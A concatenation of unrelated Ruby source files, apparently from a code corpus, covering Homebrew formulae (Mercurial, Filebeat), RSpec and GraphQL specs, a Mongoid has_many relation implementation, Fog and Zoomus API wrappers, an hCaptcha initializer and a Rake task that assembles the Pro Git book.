ENV.minimal_optimization if MacOS.version <= :snow_leopard
system "make", "PREFIX=#{prefix}", "install-bin"
# Install man pages, which come pre-built in source releases
man1.install "doc/hg.1"
man5.install "doc/hgignore.5", "doc/hgrc.5"
# install the completion scripts
bash_completion.install "contrib/bash_completion" => "hg-completion.bash"
zsh_completion.install "contrib/zsh_completion" => "_hg"
end
test do
system "#{bin}/hg", "init"
end
end
| 35.878788 | 95 | 0.757601 |
391f5a0545f37a10d4e990a7dd4f7ec743b55942 | 514 | require File.join(File.dirname(__FILE__), "..", "spec_helper.rb")
module Crunchbase
describe NewItem, :vcr do
subject { NewItem.lists_for_permalink("facebook") }
it_has_behavior 'pagination'
it_behaves_like 'a container', 1000
describe 'paging' do
let(:page) { 4 }
subject { NewItem.lists_for_permalink("facebook", {page: page}) }
its(:next_page_url) { should be nil }
its(:per_page) { should eq(1000) }
its(:current_page) { should eq(page) }
end
end
end
| 25.7 | 71 | 0.655642 |
1d3bb2677a5648e71dbc6cc067ddeab30d7c9bef | 552 | ActiveRecord::Schema.define do
create_table :audits, force: true do |t|
t.column :auditable_id, :integer
t.column :auditable_type, :string
t.column :user_id, :integer
t.column :user_type, :string
t.column :username, :string
t.column :action, :string
t.column :audited_changes, :text
t.column :version, :integer, default: 0
t.column :comment, :string
t.column :created_at, :datetime
t.column :remote_address, :string
t.column :association_id, :integer
t.column :association_type, :string
end
end
| 29.052632 | 43 | 0.692029 |
330f43d2c54c8760f63838b596417abe4845c77e | 148 | json.extract! monitored_service_log, :id, :delay, :delivery_ratio, :created_at
json.url monitored_service_url(monitored_service_log, format: :json)
| 49.333333 | 78 | 0.824324 |
6299b96a9b30282e9731ec90b81e2cdefdbd39b6 | 636 | require 'fog/core/collection'
require 'fog/openstack/models/compute/tenant'
module Fog
module Compute
class OpenStack
class Tenants < Fog::Collection
model Fog::Compute::OpenStack::Tenant
def all
load(service.list_tenants.body['tenants'])
end
def usages(start_date = nil, end_date = nil, details = false)
service.list_usages(start_date, end_date, details).body['tenant_usages']
end
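        # A hedged usage sketch (connection options and dates are illustrative):
        #
        #   compute = Fog::Compute.new(provider: 'OpenStack', ...)
        #   compute.tenants.usages('2015-01-01', '2015-02-01', true)
        #   # => array of per-tenant usage hashes for the given period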
def find_by_id(id)
self.find {|tenant| tenant.id == id}
end
end # class Tenants
end # class OpenStack
end # module Compute
end # module Fog
| 25.44 | 82 | 0.638365 |
612bcc95738bd0eb8780d6f62d572be9df8f8394 | 551 | module GrapedMoviez
module Models
DB = Sequel.connect(GrapedMoviez::Configuration.config.db_url)
class Day < Sequel::Model
one_to_many :functions
def validate
super
errors.add(:day, "can't be blank") if day.nil?
end
def self.by_day(day = Date.new)
Day.where(day: day)
end
def self.by_day_range(start_date: Date.new, end_date: Date.new)
day_range = start_date..end_date
Day.where(day: day_range).eager(functions: :reservations)
end
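      # A hedged usage sketch:
      #
      #   week = Day.by_day_range(start_date: Date.today, end_date: Date.today + 6)
      #   week.all # => days in the range, with functions and reservations eager-loaded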
end
end
end
| 22.958333 | 69 | 0.629764 |
1d9c6a9d649ed64191c1ed0e714dff43e8c2eb7f | 2,398 | # frozen_string_literal: true
require 'spec_helper'
RSpec.describe 'Updating an escalation policy' do
include GraphqlHelpers
let_it_be(:user) { create(:user) }
let_it_be(:project) { create(:project) }
let_it_be(:escalation_policy) { create(:incident_management_escalation_policy, project: project) }
let_it_be(:schedule) { escalation_policy.rules.first.oncall_schedule }
let(:variables) do
{
id: escalation_policy.to_global_id.to_s,
name: 'Updated Policy Name',
description: 'Updated Description',
rules: [rule_variables]
}
end
let(:rule_variables) do
{
oncallScheduleIid: schedule.iid,
elapsedTimeSeconds: 60,
status: 'ACKNOWLEDGED'
}
end
let(:mutation) do
graphql_mutation(:escalation_policy_update, variables) do
<<~QL
errors
escalationPolicy {
id
name
description
rules {
status
elapsedTimeSeconds
oncallSchedule { iid }
}
}
QL
end
end
let(:mutation_response) { graphql_mutation_response(:escalation_policy_update) }
before do
stub_licensed_features(oncall_schedules: true, escalation_policies: true)
project.add_maintainer(user)
end
it 'updates the escalation policy' do
post_graphql_mutation(mutation, current_user: user)
expect(response).to have_gitlab_http_status(:success)
expect(mutation_response).to eq(
'errors' => [],
'escalationPolicy' => {
'id' => escalation_policy.to_global_id.to_s,
'name' => variables[:name],
'description' => variables[:description],
'rules' => [{
'status' => rule_variables[:status],
'elapsedTimeSeconds' => rule_variables[:elapsedTimeSeconds],
'oncallSchedule' => { 'iid' => schedule.iid.to_s }
}]
}
)
expect(escalation_policy.reload).to have_attributes(
name: variables[:name],
description: variables[:description],
active_rules: [
have_attributes(
oncall_schedule: schedule,
status: rule_variables[:status].downcase,
elapsed_time_seconds: rule_variables[:elapsedTimeSeconds]
)
]
)
end
include_examples 'correctly reorders escalation rule inputs' do
let(:resolve) { post_graphql_mutation(mutation, current_user: user) }
end
end
| 26.351648 | 100 | 0.647206 |
010091381544b61f282a8f4c2f2e11bffb411a77 | 1,281 | =begin
Example:
# fonts
:system.nsfont => NSFont.systemFontOfSize(NSFont.systemFontSize)
:label.nsfont => NSFont.systemFontOfSize(NSFont.labelFontSize)
You can extend the defaults by adding entries:
Symbol.nsfontsize[:big] = 40
:big.nsfont => NSFont
=end
class Symbol
def nsfont(size=nil)
size ||= NSFont.systemFontSize
# system fonts
if Symbol.nsfont.has_key? self
font = SugarCube.look_in(self, Symbol.nsfont)
if size.is_a?(Symbol)
size = size.nsfontsize
end
if font.is_a?(Symbol)
return NSFont.send(font, size)
else
return font.nsfont(size)
end
else
if size.is_a?(Symbol)
size = size.nsfontsize
end
return NSFont.systemFontOfSize(size)
end
end
def nsfontsize
size = SugarCube.look_in(self, Symbol.nsfontsize)
if size.is_a?(Symbol)
return NSFont.send(size)
end
return size.to_f
end
class << self
attr :nsfont
attr :nsfontsize
end
@nsfont = {
system: :"systemFontOfSize:",
bold: :"boldSystemFontOfSize:",
monospace: 'Courier New',
}
@nsfontsize = {
label: :labelFontSize,
button: :buttonFontSize,
small: :smallSystemFontSize,
system: :systemFontSize,
}
end
| 19.119403 | 68 | 0.637783 |
18d22cc7943efa56771fb72ed9b994331b83326d | 22,617 | # encoding: utf-8
module Mongoid
module Relations
module Referenced
# This class defines the behaviour for all relations that are a
# one-to-many between documents in different collections.
class Many < Relations::Many
delegate :count, to: :criteria
delegate :first, :in_memory, :last, :reset, :uniq, to: :target
# Appends a document or array of documents to the relation. Will set
# the parent and update the index in the process.
#
# @example Append a document.
# person.posts << post
#
# @example Push a document.
# person.posts.push(post)
#
# @example Concat with other documents.
# person.posts.concat([ post_one, post_two ])
#
# @param [ Document, Array<Document> ] *args Any number of documents.
#
# @return [ Array<Document> ] The loaded docs.
#
# @since 2.0.0.beta.1
def <<(*args)
docs = args.flatten
return concat(docs) if docs.size > 1
if doc = docs.first
append(doc)
doc.save if persistable? && !_assigning? && !doc.validated?
end
self
end
alias :push :<<
# Appends an array of documents to the relation. Performs a batch
# insert of the documents instead of persisting one at a time.
#
# @example Concat with other documents.
# person.posts.concat([ post_one, post_two ])
#
# @param [ Array<Document> ] documents The docs to add.
#
# @return [ Array<Document> ] The documents.
#
# @since 2.4.0
def concat(documents)
inserts = []
documents.each do |doc|
next unless doc
append(doc)
save_or_delay(doc, inserts) if persistable?
end
persist_delayed(inserts)
self
end
# Build a new document from the attributes and append it to this
# relation without saving.
#
# @example Build a new document on the relation.
# person.posts.build(:title => "A new post")
#
# @overload build(attributes = {}, options = {}, type = nil)
# @param [ Hash ] attributes The attributes of the new document.
# @param [ Hash ] options The scoped assignment options.
# @param [ Class ] type The optional subclass to build.
#
# @overload build(attributes = {}, type = nil)
# @param [ Hash ] attributes The attributes of the new document.
# @param [ Class ] type The optional subclass to build.
#
# @return [ Document ] The new document.
#
# @since 2.0.0.beta.1
def build(attributes = {}, options = {}, type = nil)
if options.is_a? Class
options, type = {}, options
end
doc = Factory.build(type || klass, attributes, options)
append(doc)
doc.apply_post_processed_defaults
yield(doc) if block_given?
doc.run_callbacks(:build) { doc }
doc
end
alias :new :build
# Delete the document from the relation. This will set the foreign key
# on the document to nil. If the dependent options on the relation are
# :delete or :destroy the appropriate removal will occur.
#
# @example Delete the document.
# person.posts.delete(post)
#
# @param [ Document ] document The document to remove.
#
# @return [ Document ] The matching document.
#
# @since 2.1.0
def delete(document)
target.delete(document) do |doc|
if doc
unbind_one(doc)
cascade!(doc)
end
end
end
# Deletes all related documents from the database given the supplied
# conditions.
#
# @example Delete all documents in the relation.
# person.posts.delete_all
#
        # @example Conditionally delete all documents in the relation.
# person.posts.delete_all({ :title => "Testing" })
#
# @param [ Hash ] conditions Optional conditions to delete with.
#
# @return [ Integer ] The number of documents deleted.
#
# @since 2.0.0.beta.1
def delete_all(conditions = nil)
remove_all(conditions, :delete_all)
end
# Destroys all related documents from the database given the supplied
# conditions.
#
# @example Destroy all documents in the relation.
# person.posts.destroy_all
#
        # @example Conditionally destroy all documents in the relation.
# person.posts.destroy_all({ :title => "Testing" })
#
# @param [ Hash ] conditions Optional conditions to destroy with.
#
      # @return [ Integer ] The number of documents destroyed.
#
# @since 2.0.0.beta.1
def destroy_all(conditions = nil)
remove_all(conditions, :destroy_all)
end
# Iterate over each document in the relation and yield to the provided
# block.
#
# @note This will load the entire relation into memory.
#
# @example Iterate over the documents.
# person.posts.each do |post|
# post.save
# end
#
# @return [ Array<Document> ] The loaded docs.
#
# @since 2.1.0
def each
target.each { |doc| yield(doc) if block_given? }
end
      # Find the matching document on the association, either based on id or
# conditions.
#
# @example Find by an id.
# person.posts.find(BSON::ObjectId.new)
#
# @example Find by multiple ids.
# person.posts.find([ BSON::ObjectId.new, BSON::ObjectId.new ])
#
# @param [ BSON::ObjectId, Array<BSON::ObjectId> ] arg The ids.
#
# @return [ Document, Criteria ] The matching document(s).
#
# @since 2.0.0.beta.1
def find(*args)
criteria.find(*args)
end
# Instantiate a new references_many relation. Will set the foreign key
# and the base on the inverse object.
#
# @example Create the new relation.
# Referenced::Many.new(base, target, metadata)
#
# @param [ Document ] base The document this relation hangs off of.
# @param [ Array<Document> ] target The target of the relation.
# @param [ Metadata ] metadata The relation's metadata.
#
# @since 2.0.0.beta.1
def initialize(base, target, metadata)
init(base, Targets::Enumerable.new(target), metadata) do
raise_mixed if klass.embedded?
end
end
# Removes all associations between the base document and the target
# documents by deleting the foreign keys and the references, orphaning
# the target documents in the process.
#
# @example Nullify the relation.
# person.posts.nullify
#
# @since 2.0.0.rc.1
def nullify
criteria.update(foreign_key => nil)
target.clear do |doc|
unbind_one(doc)
end
end
alias :nullify_all :nullify
# Clear the relation. Will delete the documents from the db if they are
# already persisted.
#
# @example Clear the relation.
# person.posts.clear
#
# @return [ Many ] The relation emptied.
#
# @since 2.0.0.beta.1
def purge
unless metadata.destructive?
nullify
else
criteria.delete_all
target.clear do |doc|
unbind_one(doc)
doc.destroyed = true
end
end
end
alias :clear :purge
# Substitutes the supplied target documents for the existing documents
# in the relation. If the new target is nil, perform the necessary
# deletion.
#
# @example Replace the relation.
# person.posts.substitute([ new_post ])
#
# @param [ Array<Document> ] replacement The replacement target.
#
# @return [ Many ] The relation.
#
# @since 2.0.0.rc.1
def substitute(replacement)
if replacement
new_docs, docs = replacement.compact, []
new_ids = new_docs.map { |doc| doc.id }
remove_not_in(new_ids)
new_docs.each do |doc|
docs.push(doc) if doc.send(foreign_key) != base.id
end
concat(docs)
else
purge
end
self
end
# Get a criteria for the documents without the default scoping
# applied.
#
# @example Get the unscoped criteria.
# person.posts.unscoped
#
# @return [ Criteria ] The unscoped criteria.
#
# @since 2.4.0
def unscoped
klass.unscoped.where(
foreign_key => Conversions.flag(base.id, metadata)
)
end
private
# Appends the document to the target array, updating the index on the
# document at the same time.
#
# @example Append the document to the relation.
# relation.append(document)
#
# @param [ Document ] document The document to append to the target.
#
# @since 2.0.0.rc.1
def append(document)
target.push(document)
characterize_one(document)
bind_one(document)
end
# Instantiate the binding associated with this relation.
#
# @example Get the binding.
# relation.binding([ address ])
#
# @param [ Array<Document> ] new_target The new documents to bind with.
#
# @return [ Binding ] The binding.
#
# @since 2.0.0.rc.1
def binding
Bindings::Referenced::Many.new(base, target, metadata)
end
# Get the collection of the relation in question.
#
# @example Get the collection of the relation.
# relation.collection
#
# @return [ Collection ] The collection of the relation.
#
# @since 2.0.2
def collection
klass.collection
end
# Returns the criteria object for the target class with its documents set
# to target.
#
# @example Get a criteria for the relation.
# relation.criteria
#
# @return [ Criteria ] A new criteria.
#
# @since 2.0.0.beta.1
def criteria
Many.criteria(metadata, Conversions.flag(base.id, metadata), base.class)
end
# Perform the necessary cascade operations for documents that just got
# deleted or nullified.
#
# @example Cascade the change.
# relation.cascade!(document)
#
# @param [ Document ] document The document to cascade on.
#
# @return [ true, false ] If the metadata is destructive.
#
# @since 2.1.0
def cascade!(document)
if persistable?
if metadata.destructive?
document.send(metadata.dependent)
else
document.save
end
end
end
# If the target array does not respond to the supplied method then try to
# find a named scope or criteria on the class and send the call there.
#
# If the method exists on the array, use the default proxy behavior.
#
# @param [ Symbol, String ] name The name of the method.
# @param [ Array ] args The method args
# @param [ Proc ] block Optional block to pass.
#
# @return [ Criteria, Object ] A Criteria or return value from the target.
#
# @since 2.0.0.beta.1
def method_missing(name, *args, &block)
if target.respond_to?(name)
target.send(name, *args, &block)
else
klass.send(:with_scope, criteria) do
criteria.send(name, *args, &block)
end
end
end
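      # Illustrative sketch of the delegation above (assumes a Person model
      # with has_many :posts and a scope named :published defined on Post):
      #
      #   person.posts.published
      #   # => not a method on the in-memory target, so it is forwarded to the
      #   #    relation's criteria and run as a Post query scoped to this relation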
# Persist all the delayed batch inserts.
#
# @api private
#
# @example Persist the delayed batch inserts.
# relation.persist_delayed([ doc ])
#
# @param [ Array<Document> ] inserts The delayed inserts.
#
# @since 3.0.0
def persist_delayed(inserts)
if inserts.any?
collection.insert(inserts.map(&:as_document))
inserts.each do |doc|
doc.new_record = false
doc.run_after_callbacks(:create, :save)
doc.post_persist
end
end
end
# Are we able to persist this relation?
#
# @example Can we persist the relation?
# relation.persistable?
#
# @return [ true, false ] If the relation is persistable.
#
# @since 2.1.0
def persistable?
!_binding? && (_creating? || base.persisted? && !_building?)
end
# Deletes all related documents from the database given the supplied
# conditions.
#
# @example Delete all documents in the relation.
# person.posts.delete_all
#
      # @example Conditionally delete all documents in the relation.
# person.posts.delete_all({ :title => "Testing" })
#
# @param [ Hash ] conditions Optional conditions to delete with.
      # @param [ Symbol ] method The deletion method to call.
#
# @return [ Integer ] The number of documents deleted.
#
# @since 2.1.0
def remove_all(conditions = nil, method = :delete_all)
selector = conditions || {}
removed = klass.send(method, selector.merge!(criteria.selector))
target.delete_if do |doc|
if doc.matches?(selector)
unbind_one(doc) and true
end
end
removed
end
# Remove all the documents in the proxy that do not have the provided
# ids.
#
# @example Remove all documents without the ids.
# proxy.remove_not_in([ id ])
#
# @param [ Array<Object> ] ids The ids.
#
# @since 2.4.0
def remove_not_in(ids)
removed = criteria.not_in(_id: ids)
if metadata.destructive?
removed.delete_all
else
removed.update(foreign_key => nil)
end
in_memory.each do |doc|
if !ids.include?(doc.id)
unbind_one(doc)
target.delete(doc)
if metadata.destructive?
doc.destroyed = true
end
end
end
end
# Save a persisted document immediately or delay a new document for
# batch insert.
#
# @api private
#
# @example Save or delay the document.
# relation.save_or_delay(doc, [])
#
# @param [ Document ] doc The document.
# @param [ Array<Document> ] inserts The inserts.
#
# @since 3.0.0
def save_or_delay(doc, inserts)
if doc.new_record? && doc.valid?(:create)
inserts.push(doc)
doc.run_before_callbacks(:save, :create)
else
doc.save
end
end
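      # Illustrative sketch of the batch flow above (hypothetical documents):
      #
      #   person.posts.concat([ Post.new, Post.new, already_persisted_post ])
      #   # => the two new records get their before callbacks run here, are
      #   #    collected into the inserts array, and are written with a single
      #   #    collection.insert in #persist_delayed (which then runs the after
      #   #    callbacks); the already persisted document is saved individually.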
class << self
# Return the builder that is responsible for generating the documents
# that will be used by this relation.
#
# @example Get the builder.
# Referenced::Many.builder(meta, object)
#
# @param [ Document ] base The base document.
# @param [ Metadata ] meta The metadata of the relation.
# @param [ Document, Hash ] object A document or attributes to build
# with.
#
# @return [ Builder ] A new builder object.
#
# @since 2.0.0.rc.1
def builder(base, meta, object)
Builders::Referenced::Many.new(base, meta, object || [])
end
# Get the standard criteria used for querying this relation.
#
# @example Get the criteria.
# Proxy.criteria(meta, id, Model)
#
# @param [ Metadata ] metadata The metadata.
# @param [ Object ] object The value of the foreign key.
# @param [ Class ] type The optional type.
#
# @return [ Criteria ] The criteria.
#
# @since 2.1.0
def criteria(metadata, object, type = nil)
crit = metadata.klass.where(metadata.foreign_key => object)
if metadata.polymorphic?
crit = crit.where(metadata.type => type.name)
end
inverse_metadata = metadata.inverse_metadata(metadata.klass)
if inverse_metadata && inverse_metadata.inverse_of_field
crit = crit.any_in(inverse_metadata.inverse_of_field => [metadata.name, nil])
end
crit
end
# Eager load the relation based on the criteria.
#
# @example Eager load the criteria.
# Proxy.eager_load(metadata, criteria)
#
# @param [ Metadata ] metadata The relation metadata.
# @param [ Array<Object> ] ids The ids of the base docs.
#
# @return [ Criteria ] The criteria to eager load the relation.
#
# @since 2.2.0
def eager_load(metadata, ids)
eager_load_ids(metadata, ids) { |doc, key| IdentityMap.set_many(doc, key) }
end
# Returns true if the relation is an embedded one. In this case
# always false.
#
# @example Is this relation embedded?
# Referenced::Many.embedded?
#
# @return [ false ] Always false.
#
# @since 2.0.0.rc.1
def embedded?
false
end
# Get the foreign key for the provided name.
#
# @example Get the foreign key.
# Referenced::Many.foreign_key(:person)
#
# @param [ Symbol ] name The name.
#
# @return [ String ] The foreign key.
#
# @since 3.0.0
def foreign_key(name)
"#{name}#{foreign_key_suffix}"
end
# Get the default value for the foreign key.
#
# @example Get the default.
# Referenced::Many.foreign_key_default
#
# @return [ nil ] Always nil.
#
# @since 2.0.0.rc.1
def foreign_key_default
nil
end
# Returns the suffix of the foreign key field, either "_id" or "_ids".
#
# @example Get the suffix for the foreign key.
# Referenced::Many.foreign_key_suffix
#
# @return [ String ] "_id"
#
# @since 2.0.0.rc.1
def foreign_key_suffix
"_id"
end
# Returns the macro for this relation. Used mostly as a helper in
# reflection.
#
# @example Get the macro.
# Referenced::Many.macro
#
# @return [ Symbol ] :has_many
def macro
:has_many
end
# Return the nested builder that is responsible for generating the documents
# that will be used by this relation.
#
# @example Get the nested builder.
# Referenced::Many.builder(attributes, options)
#
# @param [ Metadata ] metadata The relation metadata.
# @param [ Hash ] attributes The attributes to build with.
# @param [ Hash ] options The options for the builder.
#
# @option options [ true, false ] :allow_destroy Can documents be
# deleted?
# @option options [ Integer ] :limit Max number of documents to
# create at once.
# @option options [ Proc, Symbol ] :reject_if If documents match this
# option then they are ignored.
# @option options [ true, false ] :update_only Only existing documents
# can be modified.
#
# @return [ NestedBuilder ] A newly instantiated nested builder object.
#
# @since 2.0.0.rc.1
def nested_builder(metadata, attributes, options)
Builders::NestedAttributes::Many.new(metadata, attributes, options)
end
# Get the path calculator for the supplied document.
#
# @example Get the path calculator.
# Proxy.path(document)
#
# @param [ Document ] document The document to calculate on.
#
# @return [ Root ] The root atomic path calculator.
#
# @since 2.1.0
def path(document)
Mongoid::Atomic::Paths::Root.new(document)
end
# Tells the caller if this relation is one that stores the foreign
# key on its own objects.
#
# @example Does this relation store a foreign key?
# Referenced::Many.stores_foreign_key?
#
# @return [ false ] Always false.
#
# @since 2.0.0.rc.1
def stores_foreign_key?
false
end
# Get the valid options allowed with this relation.
#
# @example Get the valid options.
# Relation.valid_options
#
# @return [ Array<Symbol> ] The valid options.
#
# @since 2.1.0
def valid_options
[ :as, :autosave, :dependent, :foreign_key, :order ]
end
# Get the default validation setting for the relation. Determines if
# by default a validates associated will occur.
#
# @example Get the validation default.
# Proxy.validation_default
#
# @return [ true, false ] The validation default.
#
# @since 2.1.9
def validation_default
true
end
end
end
end
end
end
| 32.49569 | 91 | 0.535084 |
919e80f9ab2d5350a256843551f115625428be63 | 932 | module Zoomus
module Actions
module User
def user_list(*args)
options = Utils.extract_options!(args)
Utils.parse_response self.class.post('/user/list', :query => options)
end
def user_create(*args)
options = Utils.extract_options!(args)
Utils.require_params([:type, :email], options)
Utils.parse_response self.class.post('/user/create', :query => options)
end
def user_delete(*args)
options = Utils.extract_options!(args)
Utils.require_params([:id], options)
Utils.parse_response self.class.post('/user/delete', :query => options)
end
def user_custcreate(*args)
options = Utils.extract_options!(args)
Utils.require_params([:type, :email], options)
Utils.parse_response self.class.post('/user/custcreate', :query => options)
end
Utils.define_bang_methods(self)
end
end
end
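# Illustrative usage sketch (assumes the gem's client object mixes in this
# module and that valid API credentials are supplied; the bang variants are
# generated by Utils.define_bang_methods above):
#
#   client = Zoomus.new(api_key: "KEY", api_secret: "SECRET")
#   client.user_list(page_size: 30)
#   client.user_create(type: 1, email: "[email protected]")
#   client.user_create!(type: 1, email: "[email protected]")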
| 28.242424 | 83 | 0.641631 |
ed78d5a31976fa9be0c32a684cfb6d16db3e66e9 | 461 | # frozen_string_literal: true
Hcaptcha.configure do |config|
# Disable hcaptcha if it is not configured
if Rails.configuration.hcaptcha_site_key.nil? || Rails.configuration.hcaptcha_secret.nil?
config.skip_verify_env << Rails.env.to_s
config.site_key = "FAKE_SITE_KEY"
config.secret_key = "FAKE_SECRET_KEY"
else
config.site_key = Rails.configuration.hcaptcha_site_key
config.secret_key = Rails.configuration.hcaptcha_secret
end
end
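# A minimal sketch of extending the same setting to further environments
# (uses only the skip_verify_env accessor already relied on above):
#
#   Hcaptcha.configure do |config|
#     config.skip_verify_env << 'development' << 'test'
#   end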
| 32.928571 | 91 | 0.778742 |
219b365c449f167fa3b16adb4f2efc6ae1fab4c6 | 4,511 | class Filebeat < Formula
desc "File harvester to ship log files to Elasticsearch or Logstash"
homepage "https://www.elastic.co/products/beats/filebeat"
url "https://github.com/elastic/beats.git",
tag: "v7.9.0",
revision: "b2ee705fc4a59c023136c046803b56bc82a16c8d"
# Outside of the "x-pack" folder, source code in a given file is licensed
# under the Apache License Version 2.0
license "Apache-2.0"
head "https://github.com/elastic/beats.git"
bottle do
cellar :any_skip_relocation
sha256 "cb4df634e349a9514253380f52ce3be98e14d9000347bf866275aaeee40e7457" => :catalina
sha256 "bf8d2976d000f9afda1c7460d65836f6033ba423c7273abba6dcead0d5f4c801" => :mojave
sha256 "0ee274f2bbe43be6476f9458eea0739987f464727790add22f3d253324cf5ee7" => :high_sierra
end
depends_on "go" => :build
depends_on "[email protected]" => :build
uses_from_macos "rsync" => :build
resource "virtualenv" do
url "https://files.pythonhosted.org/packages/b1/72/2d70c5a1de409ceb3a27ff2ec007ecdd5cc52239e7c74990e32af57affe9/virtualenv-15.2.0.tar.gz"
sha256 "1d7e241b431e7afce47e77f8843a276f652699d1fa4f93b9d8ce0076fd7b0b54"
end
# Update MarkupSafe to 1.1.1, remove with next release
# https://github.com/elastic/beats/pull/20105
patch do
url "https://github.com/elastic/beats/commit/5a6ca609259956ff5dd8e4ec80b73e6c96ff54b2.patch?full_index=1"
sha256 "b362f8921611297a0879110efcb88a04cf660d120ad81cd078356d502ba4c2ce"
end
def install
# remove non open source files
rm_rf "x-pack"
ENV["GOPATH"] = buildpath
(buildpath/"src/github.com/elastic/beats").install Dir["{*,.git,.gitignore}"]
xy = Language::Python.major_minor_version "python3"
ENV.prepend_create_path "PYTHONPATH", buildpath/"vendor/lib/python#{xy}/site-packages"
resource("virtualenv").stage do
system Formula["[email protected]"].opt_bin/"python3", *Language::Python.setup_install_args(buildpath/"vendor")
end
ENV.prepend_path "PATH", buildpath/"vendor/bin" # for virtualenv
ENV.prepend_path "PATH", buildpath/"bin" # for mage (build tool)
cd "src/github.com/elastic/beats/filebeat" do
# don't build docs because it would fail creating the combined OSS/x-pack
# docs and we aren't installing them anyway
inreplace "magefile.go", "mg.SerialDeps(Fields, Dashboards, Config, includeList, fieldDocs,",
"mg.SerialDeps(Fields, Dashboards, Config, includeList,"
system "make", "mage"
# prevent downloading binary wheels during python setup
system "make", "PIP_INSTALL_PARAMS=--no-binary :all", "python-env"
system "mage", "-v", "build"
system "mage", "-v", "update"
(etc/"filebeat").install Dir["filebeat.*", "fields.yml", "modules.d"]
(etc/"filebeat"/"module").install Dir["build/package/modules/*"]
(libexec/"bin").install "filebeat"
prefix.install "build/kibana"
end
prefix.install_metafiles buildpath/"src/github.com/elastic/beats"
(bin/"filebeat").write <<~EOS
#!/bin/sh
exec #{libexec}/bin/filebeat \
--path.config #{etc}/filebeat \
--path.data #{var}/lib/filebeat \
--path.home #{prefix} \
--path.logs #{var}/log/filebeat \
"$@"
EOS
end
plist_options manual: "filebeat"
def plist
<<~EOS
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple Computer//DTD PLIST 1.0//EN"
"http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>Label</key>
<string>#{plist_name}</string>
<key>Program</key>
<string>#{opt_bin}/filebeat</string>
<key>RunAtLoad</key>
<true/>
</dict>
</plist>
EOS
end
test do
log_file = testpath/"test.log"
touch log_file
(testpath/"filebeat.yml").write <<~EOS
filebeat:
inputs:
-
paths:
- #{log_file}
scan_frequency: 0.1s
output:
file:
path: #{testpath}
EOS
(testpath/"log").mkpath
(testpath/"data").mkpath
fork do
exec "#{bin}/filebeat", "-c", "#{testpath}/filebeat.yml",
"-path.config", "#{testpath}/filebeat",
"-path.home=#{testpath}",
"-path.logs", "#{testpath}/log",
"-path.data", testpath
end
sleep 1
log_file.append_lines "foo bar baz"
sleep 5
assert_predicate testpath/"filebeat", :exist?
end
end
| 32.688406 | 141 | 0.651075 |
61ed78b192b91ea0386e99ab67f495218ce1f8f0 | 1,981 | require "testing_env"
require "formula"
require "compat/formula_specialties"
require "formula_installer"
require "keg"
require "testball_bottle"
require "testball"
class InstallBottleTests < Homebrew::TestCase
def temporary_bottle_install(formula)
refute_predicate formula, :installed?
assert_predicate formula, :bottled?
assert_predicate formula, :pour_bottle?
installer = FormulaInstaller.new(formula)
shutup { installer.install }
keg = Keg.new(formula.prefix)
assert_predicate formula, :installed?
begin
yield formula
ensure
keg.unlink
keg.uninstall
formula.clear_cache
Dir["#{HOMEBREW_CACHE}/testball_bottle*"].each { |f| File.delete(f) }
# there will be log files when sandbox is enable.
formula.logs.rmtree if formula.logs.directory?
end
refute_predicate keg, :exist?
refute_predicate formula, :installed?
end
def test_a_basic_bottle_install
MacOS.stubs(:has_apple_developer_tools?).returns(false)
temporary_bottle_install(TestballBottle.new) do |f|
# Copied directly from test_formula_installer.rb as we expect
# the same behavior
# Test that things made it into the Keg
assert_predicate f.bin, :directory?
assert_predicate f.libexec, :directory?
refute_predicate f.prefix+"main.c", :exist?
# Test that things make it into the Cellar
keg = Keg.new f.prefix
keg.link
bin = HOMEBREW_PREFIX+"bin"
assert_predicate bin, :directory?
end
end
def test_build_tools_error
MacOS.stubs(:has_apple_developer_tools?).returns(false)
# Testball doesn't have a bottle block, so use it to test this behavior
formula = Testball.new
refute_predicate formula, :installed?
refute_predicate formula, :bottled?
installer = FormulaInstaller.new(formula)
assert_raises(BuildToolsError) do
installer.install
end
refute_predicate formula, :installed?
end
end
| 25.075949 | 75 | 0.715295 |
7af1272e605392d8539317919a1e2d6037922119 | 14,598 | require 'zip'
require 'nokogiri'
require 'octokit'
require 'pathname'
def expand(content, path, &get_content)
content.gsub(/include::(\S+)\[\]/) do |line|
if File.dirname(path)=="."
new_fname = $1
else
new_fname = (Pathname.new(path).dirname + Pathname.new($1)).cleanpath.to_s
end
new_content = get_content.call(new_fname)
if new_content
      expand(new_content.gsub("\xEF\xBB\xBF".force_encoding("UTF-8"), ''), new_fname) {|c| get_content.call(c)}
else
puts "#{new_fname} could not be resolved for expansion"
""
end
end
end
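# Illustrative walk-through of the include resolution above (hypothetical file
# names and contents):
#
#   expand("include::book/intro.asc[]", "progit.asc") { |f| contents[f] }
#   # "progit.asc" sits at the root (dirname == "."), so "book/intro.asc" is
#   # looked up as-is; if book/intro.asc itself contains
#   # "include::images/figs.asc[]", the recursive call resolves it relative to
#   # its own directory, i.e. "book/images/figs.asc", via Pathname#cleanpath.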
desc "Reset book html to trigger re-build"
task :reset_book2 => :environment do
Book.where(:edition => 2).each do |book|
book.ebook_html = '0000000000000000000000000000000000000000'
book.save
end
end
def genbook(code, &get_content)
template_dir = File.join(Rails.root, 'templates')
nav = '<div id="nav"><a href="[[nav-prev]]">prev</a> | <a href="[[nav-next]]">next</a></div>'
progit = get_content.call("progit.asc")
chapters = {}
appnumber = 0
chnumber = 0
secnumber = 0
ids = {}
# The chapter files are historically located in book/<chapter_name>/1-<chapter_name>.asc
  # The new location of these files is at the root of the project
chapter_files = /(book\/[01A-C].*\/1-[^\/]*?\.asc|(?:ch[0-9]{2}|[ABC])-[^\/]*?\.asc)/
chaps = progit.scan(chapter_files).flatten
  chaps.each_with_index do |filename, index|
# select the chapter files
if filename =~ /(book\/[01].*\/1-[^\/]*\.asc|ch[0-9]{2}-.*\.asc)/
chnumber += 1
      chapters["ch#{secnumber}"] = ['chapter', chnumber, filename]
secnumber += 1
end
# detect the appendices
if filename =~ /(book\/[ABC].*\.asc|[ABC].*\.asc)/
appnumber += 1
      chapters["ch#{secnumber}"] = ['appendix', appnumber, filename]
secnumber += 1
end
end
# we strip the includes that don't match the chapters we want to include
initial_content = progit.gsub(/include::(.*\.asc)\[\]/) do |match|
if $1 =~ chapter_files
match
else
""
end
end
content = expand(initial_content, "progit.asc") { |filename| get_content.call(filename) }
# revert internal links decorations for ebooks
content.gsub!(/<<.*?\#(.*?)>>/, "<<\\1>>")
